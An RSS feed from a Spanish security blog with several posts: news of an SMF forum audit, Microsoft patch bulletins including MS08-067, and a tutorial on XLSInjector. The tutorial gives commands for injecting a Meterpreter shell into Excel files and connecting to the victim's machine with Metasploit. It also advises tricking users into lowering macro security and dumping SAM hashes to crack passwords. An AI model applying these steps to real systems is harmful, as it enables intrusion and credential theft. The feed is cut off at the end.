<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Ejecución</title> <atom:link href="http://www.dragonjar.org/tag/ejecucion/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Multiples Vulnerabilidades en SMF</title><link>http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml</link> <comments>http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml#comments</comments> <pubDate>Wed, 02 Dec 2009 16:45:13 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Auditoria]]></category> <category><![CDATA[Ejecución]]></category> <category><![CDATA[Hacker]]></category> <category><![CDATA[SMF]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[Vulnerabilidades]]></category> <category><![CDATA[Web]]></category> <category><![CDATA[XSS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3445</guid> <description><![CDATA[En el foro ElHacker.net sacaron adelante un proyecto destinado a realizar auditorías de seguridad a nivel WEB sobre el popular software de foros SMF 2.0 (Simple Machines Forum) con la finalidad de que sus desarrolladores puedan crear cada día un software mas robusto y seguro, esta auditorio dio como resultado mas de 40 fallos de [...]]]></description> <content:encoded><![CDATA[<p>En el foro ElHacker.net sacaron adelante un proyecto destinado a realizar auditorías de seguridad a nivel <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">WEB</a> sobre el popular software de foros <a
href="http://www.dragonjar.org/tag/smf" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SMF">SMF</a> 2.0 (Simple Machines Forum) con la finalidad de que sus desarrolladores puedan crear cada día un software mas robusto y seguro, esta auditorio dio como resultado mas de <a
href="http://code.google.com/p/smf2-review/issues/list">40 fallos de seguridad encontrados</a>, un <a
href="http://foro.elhacker.net/nivel_web/backdoor_nativo_en_smf_20-t272107.0.html">posible backdoor</a> que los responsables de SMF tenían en el código.</p><p
style="text-align: center;"><img
class="alignnone" title="SMF Vulnerabilidad" src="http://farm3.static.flickr.com/2522/4152538793_bef8159247_o.jpg" alt="4152538793 bef8159247 o Multiples Vulnerabilidades en SMF" width="500" height="72" /></p><p>Entre los fallos encontrados existen 3 con peligrosidad alta (uno de ellos permite <a
href="http://www.dragonjar.org/tag/ejecucion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ejecución">ejecución</a> remota de código), 14 con un nivel de peligro medio (en su mayoría ataques del tipo <a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a>) y en resto de los fallos tienen un nivel de peligrosidad bajo o nulo.<span
id="more-3445"></span></p><p>Desde la comunidad DragonJAR enviamos un saludo a los integrantes del equipo <a
href="http://twitter.com/simpleaudit">SimpleAudit</a> no solo por los fallos encontrados, sino por la publicación responsable de ellos, esperando que <a
href="http://www.simplemachines.org/community/index.php?topic=351341.0">SMF publicara una versión parcheada</a> de su software para hacer el <a
href="http://seclists.org/fulldisclosure/2009/Dec/24">Full Disclosure</a>.</p><p>Cada uno de los fallos encontrados en SMF han sido publicados y explicados <a
href="http://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html">en el foro de ElHacker.net</a> por <a
href="http://twitter.com/WHK_">WHK</a>, ademas en nuestro idioma.</p><p><strong>Mas Información:</strong><br
/> <a
href="http://labs.elhacker.net/simpleaudit">Pagina del Proyecto</a><br
/> <a
href="http://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html">Anuncio en el Foro</a><br
/> <a
href="http://seclists.org/fulldisclosure/2009/Dec/24">Full Disclosure</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml" title="Revisa la seguridad de tu sitio web Gratis">Revisa la seguridad de tu sitio web Gratis</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a
href="http://www.dragonjar.org/como-realizar-un-pentest.xhtml" title="¿Cómo se realiza un Pentest?">¿Cómo se realiza un Pentest?</a></li><li><a
href="http://www.dragonjar.org/webraider-explotacion-automatizada-de-aplicaciones-web.xhtml" title="WebRaider &#8211; Explotación automatizada de aplicaciones Web">WebRaider &#8211; Explotación automatizada de aplicaciones Web</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>XLSInjector &#8211; Inyectar Shell Meterpreter en Archivos Excel</title><link>http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml</link> <comments>http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml#comments</comments> <pubDate>Thu, 26 Nov 2009 02:31:56 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Pentest]]></category> <category><![CDATA[consola]]></category> <category><![CDATA[Documentos]]></category> <category><![CDATA[Ejecución]]></category> <category><![CDATA[meterpreter]]></category> <category><![CDATA[microsoft excel]]></category> <category><![CDATA[Shell]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3433</guid> <description><![CDATA[Para nadie es un secreto que la suite ofimática mas utilizada en el mundo es Microsoft Office, que se lleva la mayor parte de la cuota de mercado en entornos Windows y Mac, de esta suite, las aplicaciones mas utilizadas son Microsoft Word, Microsoft Excel y Microsoft Power Point que casi siempre están instaladas en [...]]]></description> <content:encoded><![CDATA[<p>Para nadie es un secreto que la suite ofimática mas utilizada en el mundo es <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> Office, que se lleva la mayor parte de la cuota de mercado en entornos <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> y Mac, de esta suite, las aplicaciones mas utilizadas son <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> Word, <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> Excel y <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> Power Point que casi siempre están instaladas en la mayoría de computadores.</p><p>En esta ocasión les voy a hablar sobre <a
href="http://code.google.com/p/xlsinjector/">XLSInjector</a>, una herramienta creada en perl por <a
style="white-space: nowrap;" href="http://code.google.com/u/keith.lee2012/">keith lee</a> que permite inyectar en un archivo XLS de <a
href="http://www.dragonjar.org/tag/microsoft-excel" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con microsoft excel">Microsoft Excel</a> una <a
href="http://www.dragonjar.org/tag/consola" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con consola">consola</a> <a
href="http://www.dragonjar.org/tag/meterpreter" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con meterpreter">meterpreter</a> (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.</p><p
style="text-align: center;"><img
class="alignnone" title="Shell en Microsoft Excel" src="http://farm3.static.flickr.com/2504/4141619399_6369cd84b7.jpg" alt="4141619399 6369cd84b7 XLSInjector   Inyectar Shell Meterpreter en Archivos Excel" width="357" height="172" /></p><p>Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:</p><ul><li>Una Maquina (virtual o real) con Windows</li><li>Microsoft Excel</li><li><a
href="http://www.activestate.com/activeperl/">Perl</a></li><li>El modulo <a
href="http://search.cpan.org/CPAN/authors/id/J/JD/JDB/Win32-OLE-0.1709.tar.gz">Win32:OLE</a> para Perl</li><li>Un archivo XML a infectar</li><li>El <a
href="http://code.google.com/p/xlsinjector/">XLSInjector</a></li><li>y por ultimo el <a
href="http://www.metasploit.com/">Metasploit Framework</a></li></ul><p>Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su <a
href="http://www.dragonjar.org/tag/ejecucion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ejecución">ejecución</a>, que es bastante simple:<span
id="more-3433"></span></p><p><code>perl xlsinjector.pl -i ArchivoDeExcel.xls  -o ArchivoConShellDeExcel.xls</code></p><p>Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que &#8220;confié&#8221; en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.</p><p>Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra <a
href="http://www.dragonjar.org/tag/shell" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Shell">shell</a> meterpreter mediante la consola del Metasploit Framework</p><ul><li>iniciamos la consola del metasploit</li><li>una vez en la consola de MSF cargamos el payload de meterpreter<br
/> <code>set payload windows/meterpreter/bind_tcp</code></li><li>lo configuramos adecuadamente<br
/> <code>set RHOST ipdelpcvictima<br
/> set RPOT 4444</code></li><li>luego lo lanzamos<br
/> <code>exploit</code></li></ul><p>Con estos simples pasos tenemos a nuestra disposición una shell meterpreter en el equipo <a
href="http://www.dragonjar.org/tag/remoto" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Remoto">remoto</a>, hay que recordar que las shell meterpreter son diferentes a las del sistema operativo, y tienen su propio listado de comandos, puedes sacar el listado de comandos disponibles para la shell meterpreter escribiendo &#8220;?&#8221; y enter, te arrojara algo parecido a esto:</p><blockquote><p><code>Core Commands<br
/> =============</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> ?             Help menu<br
/> channel       Displays information about active channels<br
/> close         Closes a channel<br
/> exit          Terminate the meterpreter session<br
/> help          Help menu<br
/> interact      Interacts with a channel<br
/> irb           Drop into irb scripting mode<br
/> migrate       Migrate the server to another process<br
/> quit          Terminate the meterpreter session<br
/> read          Reads data from a channel<br
/> run           Executes a meterpreter script<br
/> use           Load a one or more meterpreter extensions<br
/> write         Writes data to a channel</code></p><p><code>Stdapi: File system Commands<br
/> ============================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> cat           Read the contents of a file to the screen<br
/> cd            Change directory<br
/> download      Download a file or directory<br
/> edit          Edit a file<br
/> getlwd        Print local working directory<br
/> getwd         Print working directory<br
/> lcd           Change local working directory<br
/> lpwd          Print local working directory<br
/> ls            List files<br
/> mkdir         Make directory<br
/> pwd           Print working directory<br
/> rmdir         Remove directory<br
/> upload        Upload a file or directory</code></p><p><code>Stdapi: Networking Commands<br
/> ===========================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> ipconfig      Display interfaces<br
/> portfwd       Forward a local port to a remote service<br
/> route         View and modify the routing table</code></p><p><code>Stdapi: System Commands<br
/> =======================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> execute       Execute a command<br
/> getpid        Get the current process identifier<br
/> getuid        Get the user that the server is running as<br
/> kill          Terminate a process<br
/> ps            List running processes<br
/> reboot        Reboots the remote computer<br
/> reg           Modify and interact with the remote registry<br
/> rev2self      Calls RevertToSelf() on the remote machine<br
/> shutdown      Shuts down the remote computer<br
/> sysinfo       Gets information about the remote system, such as OS</code></p><p><code>Stdapi: User interface Commands<br
/> ===============================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> idletime      Returns the number of seconds the remote user has been idle<br
/> uictl         Control some of the user interface components</code></p><p><code>Priv: Password database Commands<br
/> ================================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> hashdump      Dumps the contents of the SAM database</code></p><p><code>Priv: Timestomp Commands<br
/> ========================</code></p><p><code>Command       Description<br
/> ——-       ———–<br
/> timestomp     Manipulate file MACE attributes </code></p></blockquote><p>Hay que resaltar la potencia de meterpreter para inyectar dll’s, subir ficheros, ejecutar scripts, te recomiendo que le des una leída a estos <a
href="http://www.dragonjar.org/tag/documentos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Documentos">documentos</a> (<a
href="http://www.nologin.org/Downloads/Papers/meterpreter.pdf">Meterpreter.pdf</a> y <a
href="http://www.learnsecurityonline.com/vid/MSF3-met/MSF3-met.html">MSF3-met.html</a>) para que aprendas mas sobre los comandos del meterpreter.</p><p>Te recomiendo utilizar el comando <code>migrate</code> tan pronto puedas para evitar que tan pronto cierren el archivo XLS se cierre con el tu shell, otro comando recomendado es <code>hashdump</code> que te arroja el contenido del archivo SAM en la maquina victima para que posteriormente puedas obtener la clave de los usuarios con herramientas como <a
href="http://www.l0phtcrack.com/">l0phtcrack</a> o <a
href="http://www.oxid.it/cain.html">cain&amp;abel</a>.</p><p>Por ultimo les dejo el video del autor, donde nos enseña el funcionamiento del XLSInjector</p><p
id="preview" style="text-align: center;"><object
id="player" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="564" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="name" value="player" /><param
name="flashvars" value="file=http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4" /><param
name="src" value="http://miliw0rm.securitytube.net/player.swf" /><param
name="allowfullscreen" value="true" /><param
name="quality" value="high" /><embed
id="player" type="application/x-shockwave-flash" width="640" height="564" src="http://miliw0rm.securitytube.net/player.swf" quality="high" allowfullscreen="true" flashvars="file=http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4" name="player"></embed></object></p><p><script src="http://miliw0rm.securitytube.net/swfobject.js" type="text/javascript"></script><script type="text/javascript">// <![CDATA[
   var s1 = new SWFObject('http://miliw0rm.securitytube.net/player.swf','player','640','564','9'); s1.addParam('allowfullscreen','true'); s1.addParam('allowscriptaccess','always'); s1.addParam('flashvars','file=http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4'); s1.write('preview');
// ]]&gt;</script></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/manual-en-espanol-de-meterpreter.xhtml" title="Manual en español de Meterpreter">Manual en español de Meterpreter</a></li><li><a
href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a
href="http://www.dragonjar.org/foca-herramienta-para-analisis-meta-datos.xhtml" title="FOCA &#8211; Herramienta para análisis de Meta Datos">FOCA &#8211; Herramienta para análisis de Meta Datos</a></li><li><a
href="http://www.dragonjar.org/ipad-wiimote-consola-arcade-portable.xhtml" title="iPad + Wiimote = Consola Arcade Portable">iPad + Wiimote = Consola Arcade Portable</a></li><li><a
href="http://www.dragonjar.org/como-descubrir-vulnerabilidades-y-escribir-exploits.xhtml" title="Cómo descubrir vulnerabilidades y escribir exploits">Cómo descubrir vulnerabilidades y escribir exploits</a></li><li><a
href="http://www.dragonjar.org/la-vida-en-modo-texto-ii.xhtml" title="La vida en modo texto II">La vida en modo texto II</a></li><li><a
href="http://www.dragonjar.org/la-vida-en-modo-texto-i.xhtml" title="La vida en modo texto I">La vida en modo texto I</a></li><li><a
href="http://www.dragonjar.org/google-por-linea-de-comandos.xhtml" title="Google por linea de comandos">Google por linea de comandos</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> <enclosure
url="http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4" length="7702120" type="video/mp4" /> </item> <item><title>Parches para Windows que corrigen Vulnerabilidades Criticas</title><link>http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml</link> <comments>http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml#comments</comments> <pubDate>Wed, 11 Nov 2009 00:29:20 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Noticias Software]]></category> <category><![CDATA[Criticas]]></category> <category><![CDATA[Ejecución]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Parche]]></category> <category><![CDATA[Remoto]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[Windows]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3332</guid> <description><![CDATA[Microsoft ha publicado hoy martes 10 de noviembre,  6 boletines de seguridad que contiene parches para resolver 15 fallos de seguridad en Microsoft Windows y Microsoft Office. Los fallos son bastante graves permitiendo a un atacante la ejecución de código remoto o realizar un ataque de denegación de servicios en el pc que corra una [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> ha publicado hoy martes 10 de noviembre,  6 boletines de seguridad que contiene parches para resolver 15 fallos de seguridad en <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> y Microsoft Office.</p><p
style="text-align: center;"><img
class="alignnone" title="Fallos en Microsoft Windows" src="http://farm3.static.flickr.com/2713/4094141864_29bca9afa8_o.jpg" alt="4094141864 29bca9afa8 o Parches para Windows que corrigen Vulnerabilidades Criticas" width="320" height="214" /></p><p>Los fallos son bastante graves permitiendo a un atacante la <a
href="http://www.dragonjar.org/tag/ejecucion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ejecución">ejecución</a> de código <a
href="http://www.dragonjar.org/tag/remoto" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Remoto">remoto</a> o realizar un ataque de denegación de servicios en el pc que corra una de las aplicaciones vulnerables, les dejo un listado con los fallos de seguridad y el software afectado para que puedan determinar si tienen software vulnerable e instalen los parches:<span
id="more-3332"></span></p><ul><li><a
href="http://www.microsoft.com/technet/security/Bulletin/MS09-063.mspx">Boletin de Seguridad  MS09-063 &#8211; Critico<br
/> Vulnerability in Web Services on Devices API Could Allow Remote Code Execution (973565)</a></li><li><a
href="http://www.microsoft.com/technet/security/Bulletin/MS09-064.mspx">Boletin de Seguridad MS09-064 &#8211; Critico</a><br
/> <a
href="http://www.microsoft.com/technet/security/Bulletin/MS09-064.mspx">Vulnerability in License Logging Server Could Allow Remote Code Execution (974783)</a></li><li><a
href="http://www.microsoft.com/technet/security/Bulletin/MS09-065.mspx">Boletin de Seguridad MS09-065 &#8211; Critico<br
/> Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947)</a></li><li><a
href="http://www.microsoft.com/technet/security/Bulletin/MS09-066.mspx">Boletin de Seguridad MS09-066 &#8211; Importante<br
/> Vulnerability in Active Directory Could Allow Denial of Service (973309)</a></li><li><a
href="http://www.microsoft.com/technet/security/Bulletin/MS09-067.mspx">Boletin de Seguridad MS09-067 &#8211; Importante<br
/> Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (972652)</a></li><li><a
href="http://www.microsoft.com/technet/security/Bulletin/MS09-068.mspx">Boletin de Seguridad MS09-068 &#8211; Importante<br
/> Vulnerability in Microsoft Office Word Could Allow Remote Code Execution (976307)</a></li></ul><p>Es muy recomendable que actualices tu sistema operativo y tu suite ofimática para evitar la oleada de gusanos y malware que no demoran en explotar estos fallos para propagarse por toda la red.</p><h2 style="text-align: center;"><a
href="http://update.microsoft.com/windowsupdate/v6/default.aspx?ln=es">Actualizar tu Windows desde la pagina de Microsoft Windows Update</a></h2><p><strong>Fuente:</strong><br
/> <a
href="http://www.microsoft.com/technet/security/current.aspx">Microsoft Security Bulletin </a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li><li><a
href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li><li><a
href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li><li><a
href="http://www.dragonjar.org/la-mejor-defensa-es-la-informacion.xhtml" title="La Mejor Defensa es la Información">La Mejor Defensa es la Información</a></li><li><a
href="http://www.dragonjar.org/microsoft-publica-8-nuevas-actualizaciones-de-seguridad.xhtml" title="Microsoft publica 8 Nuevas Actualizaciones de seguridad">Microsoft publica 8 Nuevas Actualizaciones de seguridad</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</title><link>http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml</link> <comments>http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml#comments</comments> <pubDate>Thu, 23 Oct 2008 22:02:44 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[2008]]></category> <category><![CDATA[7]]></category> <category><![CDATA[Codigo]]></category> <category><![CDATA[Ejecución]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Parche]]></category> <category><![CDATA[Remoto]]></category> <category><![CDATA[Vista]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[Windows]]></category> <category><![CDATA[XP]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1341</guid> <description><![CDATA[Microsoft acaba de publicar un parche que corrige una vulnerabilidad que cataloga como &#8220;critica&#8221; y afecta todos los sistemas Windows (desde Windows 2000 a Vista, pasando por XP, 2003, 2008 e incluso el futuro Windows 7 aun en pruebas). El alcance del fallo depende del sabor de Windows que utilice el sistema atacado, Los mas [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a> acaba de publicar un <a
href="http://www.dragonjar.org/tag/parche" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Parche">parche</a> que corrige una <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a> que cataloga como &#8220;critica&#8221; y afecta todos los sistemas <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> (desde <a
href="http://www.dragonjar.org/tag/windows" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows">Windows</a> 2000 a <a
href="http://www.dragonjar.org/tag/vista" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vista">Vista</a>, pasando por <a
href="http://www.dragonjar.org/tag/xp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XP">XP</a>, 2003, 2008 e incluso el futuro Windows 7 aun en pruebas).</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img503.imageshack.us/img503/2615/bugbr9.jpg" alt="bugbr9 Microsoft Publica parche que corrige Vulnerabilidad Critica"  title="Microsoft Publica parche que corrige Vulnerabilidad Critica" /></p><p>El alcance del fallo depende del sabor de Windows que utilice el sistema atacado, Los mas afectados son los Sistemas Windows 2000, XP y 2003 ya que esta vulnerabilidad proporciona el control total de forma remota  al sistema víctima a través de los recursos compartidos, facilitando la <a
href="http://www.dragonjar.org/tag/ejecucion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ejecución">ejecución</a> de código malicioso y todo esto sin necesidad autenticación ni participación alguna por parte del usuario de la máquina atacada, lo que  deja el terreno abonado para que un gusano automatice el ataque y cause grandes daños.<span
id="more-1341"></span></p><p>De momento la solución recomendada es actualizar nuestro sistema tan pronto como sea posible utilizando el Windows Update, tener un buen Firewall en nuestra maquina (Al parecer, el firewall de SP2 evita el ataque, siempre que esté activado y no esté habilitada la compartición de ficheros e impresoras); El panorama es mas &#8220;alentador&#8221; para los sistemas Microsoft Windows Vista y 2008 Server, ya que al parecer sólo es posible provocar denegaciones de servicio.</p><p><strong>Mas Información:</strong><br
/> <a
href="http://blogs.technet.com/seguridad/archive/2008/10/23/ms08-067-liberado.aspx">Informacion Tecnica del Parche MS08-067</a><br
/> <a
href="http://blogs.technet.com/msrc/archive/2008/10/22/advance-notification-for-out-of-band-release.aspx">Anuncio en el blog de Technet</a><br
/> Otros portales que hablan del fallo: <a
href="http://www.kriptopolis.org/microsoft-lanza-parche-urgente">Kriptopolis</a>, <a
href="http://www.hispasec.com/unaaldia/3652">Hispasec</a>, <a
href="http://www.seguridad.unam.mx/vulnerabilidadesDB/?vulne=5667">seguridad.unam.mx</a>, <a
href="http://www.blogantivirus.com/actualizacion-critica-ms08-067-para-microsoft-windows">BlogAntivirus</a>, <a
href="http://www.frsirt.com/english/advisories/2008/2902">FrSIRT</a>, <a
href="http://www.que20.com/2008/10/23/vulnerabilidad-critica-en-microsoft-windows-ms08-067/">Q2.0</a>, <a
href="http://www.cgisecurity.org/2008/10/emergency-micro.html">cgisecurity</a>, <a
href="http://seguridaddescifrada.blogspot.com/2008/10/parche-de-severidad-alta-ms08-067.html">seguridaddescifrada</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a
href="http://www.dragonjar.org/recuperar-contrasenas-de-windows-vista-y-anteriores.xhtml" title="Recuperar contraseña windows 7, Vista, XP y Anteriores">Recuperar contraseña windows 7, Vista, XP y Anteriores</a></li><li><a
href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml" title="Nueva versión de Cain &#038; Abel">Nueva versión de Cain &#038; Abel</a></li><li><a
